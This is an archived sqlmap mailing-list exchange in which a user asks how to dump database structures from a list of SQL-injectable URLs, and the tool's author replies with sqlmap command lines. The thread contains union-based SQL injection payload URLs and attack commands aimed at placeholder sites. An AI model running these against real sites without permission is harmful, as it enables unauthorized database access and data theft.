Thanks for your reply "Miroslav Stampar", i understood.
07.10.2015 13:05, Miroslav Stampar пишет:
> sqlmap has to find a SQLi. It can't just dump data without knowing
> anything about the SQLi. Every SQLi technique has different rules for
> data dumping.
>
> I would suggest that you run (if you want to be stricter with your
> given cases):
>
> python sqlmap.py -u "http://hello.com/index.php?id=1" --technique=BU
> --prefix="" --suffix="-- -" --union-cols=5
> python sqlmap.py -u "http://world.com/index.php?page=3" --technique=BU
> --prefix="" --suffix="-- -" --union-cols=5
>
> Bye
>
> On Wed, Oct 7, 2015 at 11:47 AM, bogdan <bog...@ou...
> <mailto:bog...@ou...>> wrote:
>
> Hello!
>
> I have a list of vulners UnionBased urls(example):
>
> http://hello.com/index.php?id=-1+and+union+all+select+1,2,3,[point],4,5--
> http://world.com/index.php?page=3+and+union+all+select+1,2,3,4,[point]--
>
> How can i to load one url of this list to sqlmap and dumping structure
> of database, without finding injecting point?
>
> Sorry, for my bad English, and Thanks!
>
> ------------------------------------------------------------------------------
> Full-scale, agent-less Infrastructure Monitoring from a single
> dashboard
> Integrate with 40+ ManageEngine ITSM Solutions for complete visibility
> Physical-Virtual-Cloud Infrastructure monitoring from one console
> Real user monitoring with APM Insights and performance trend reports
> Learn More
> http://pubads.g.doubleclick.net/gampad/clk?id=247754911&iu=/4140
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> <mailto:sql...@li...>
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
|
